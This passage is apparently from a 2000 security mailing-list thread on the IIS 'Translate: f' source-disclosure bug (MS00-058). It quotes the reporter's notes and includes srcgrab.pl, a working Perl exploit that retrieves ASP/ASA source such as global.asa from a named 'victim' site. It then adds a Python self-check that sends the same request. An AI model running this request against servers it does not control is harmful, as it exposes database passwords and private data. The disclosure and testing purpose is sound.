> > Q256888 (now inaccessible) where original version was clearly talking about
> > "Translate:f" (curious how it will look when it is "rewritten").
> >
> > http://download.microsoft.com/download/win2000srv/Patch/Q262259/NT5/EN-US/Q262259_W2K_SP1_X86_EN.EXE
> > original US ENGLISH hotfix from 6th of June
> >
> > http://support.microsoft.com/support/kb/articles/q262/2/59.ASP
> > another KB article showing link to Q256888 as :
> > "Internet Information Service Returns Source of Active Server Pages File
> > When Request Contains Translate:f and Ends with a Backslash" - maybe save it
> > for your kids to see how Microsoft changes history!
> >
> > http://security.namodro.cz/urlcheck.asp?lang=en
> > English version of pages letting anyone to verify if his/her server is not
> > vulnerable to Translate:f (and some other similar "url" related bugs).
> >
> > THOUGHTS
> > -----------------
> >
> > Most important and dangerous aspect of bugs leading to source of ASP/ASA is
> > not in giving away your business logic. It is not worth of trying to
> > download all ASP/ASA files and decode how something works. Most important
> > aspect is in showing PASSWORDS to access SQL Server Databases and LOCATIONS
> > of Access databases. This is how sites are hacked and private sensitive data
> > are falling in hands of strangers.
> >
> > Even after YEARS of existence of ASP files, Microsoft did nothing to remove
> > one from most dangerous aspect - that ASP/ASA files are used for storing
> > passwords and sensitive information.
> >
> > Daniel
> >
>
>
___________________cut here___________________________
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)
use LWP::UserAgent;
use HTTP::Request;
if (not $ARGV[0]) {
print qq~
Geee it's running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=$ARGV[0];
# Create a user agent object
$ua = new LWP::UserAgent;
# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
Srcgrab.pl exploits the Translate:f bug as described in ms00-058. The vulnerability, present in IIS 4.0 and Windows 2000 Frontpage server extensions, allows a remote user to retrieve the source of .asa and .asp pages.
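An added example, not from the advisory or from srcgrab.pl: a Python self-check that builds the request srcgrab.pl sends and compares the answer with a plain GET of the same URL, for testing a server you are responsible for. Daniel's post says a trailing "/", while the KB title and srcgrab.pl use a backslash, so the live check tries both. The assumption that a disclosed file is recognisable by "<%" or a runat="server" block, and the sample response bodies, are mine.

```python
# Added example (not from the advisory or srcgrab.pl): self-check for the
# Translate: f source disclosure.  The request shape follows srcgrab.pl above;
# the "<%" / runat="server" heuristic and the sample bodies are assumptions.
import http.client
import re

# Server-side markup that a processed ASP/ASA page should never hand to a client.
ASP_SOURCE = re.compile(rb"<%|<script[^>]*runat\s*=\s*[\"']?server", re.I)

def build_translate_f_request(host, path, terminator="\\"):
    """Raw GET as srcgrab.pl sends it: path plus trailing terminator and Translate: f."""
    return (
        "GET " + path + terminator + " HTTP/1.0\r\n"
        "Host: " + host + "\r\n"
        "Translate: f\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")

def looks_like_source(body):
    """True when a response body carries script markup instead of rendered output."""
    return ASP_SOURCE.search(body) is not None

def classify(normal_body, translate_body):
    """Compare a plain GET with the Translate: f variant of the same URL."""
    if looks_like_source(normal_body):
        return "source-in-normal-response"      # handler mapping problem, not Translate: f
    if looks_like_source(translate_body):
        return "translate-f-source-disclosure"
    return "not-vulnerable"

def fetch(host, path, translate, port=80, terminator="\\"):
    """Live probe (needs network; not used by the offline checks). Returns (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    headers = {"Host": host}
    target = path
    if translate:
        headers["Translate"] = "f"
        target = path + terminator
    conn.request("GET", target, headers=headers)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body

def check_server(host, path, port=80):
    """Run the comparison live with both terminators ("\\" per the KB title, "/" per Daniel's post)."""
    _, normal = fetch(host, path, False, port)
    verdicts = [classify(normal, fetch(host, path, True, port, t)[1]) for t in ("\\", "/")]
    if "translate-f-source-disclosure" in verdicts:
        return "translate-f-source-disclosure"
    return verdicts[0]

# Constructed sample bodies for offline use (not captured from any server).
RENDERED_PAGE = b"<html><body><h1>Welcome to the shop</h1></body></html>"
LEAKED_GLOBAL_ASA = (b"<script language=\"VBScript\" runat=\"server\">\r\n"
                     b"Sub Application_OnStart\r\n"
                     b"  Application(\"DSN\") = \"Provider=SQLOLEDB;Data Source=sql1;User ID=sa;Password=example\"\r\n"
                     b"End Sub\r\n</script>")
LEAKED_DEFAULT_ASP = b"<%@ Language=VBScript %>\r\n<% Response.Write \"hi\" %>"

if __name__ == "__main__":
    print(build_translate_f_request("www.victimsite.com", "/global.asa").decode())
    print(classify(RENDERED_PAGE, LEAKED_GLOBAL_ASA))
    print(classify(RENDERED_PAGE, RENDERED_PAGE))
```

The comparison against the plain GET matters: a server that returns script text for every request has a handler-mapping problem, which is a different fix from the MS00-058 patch.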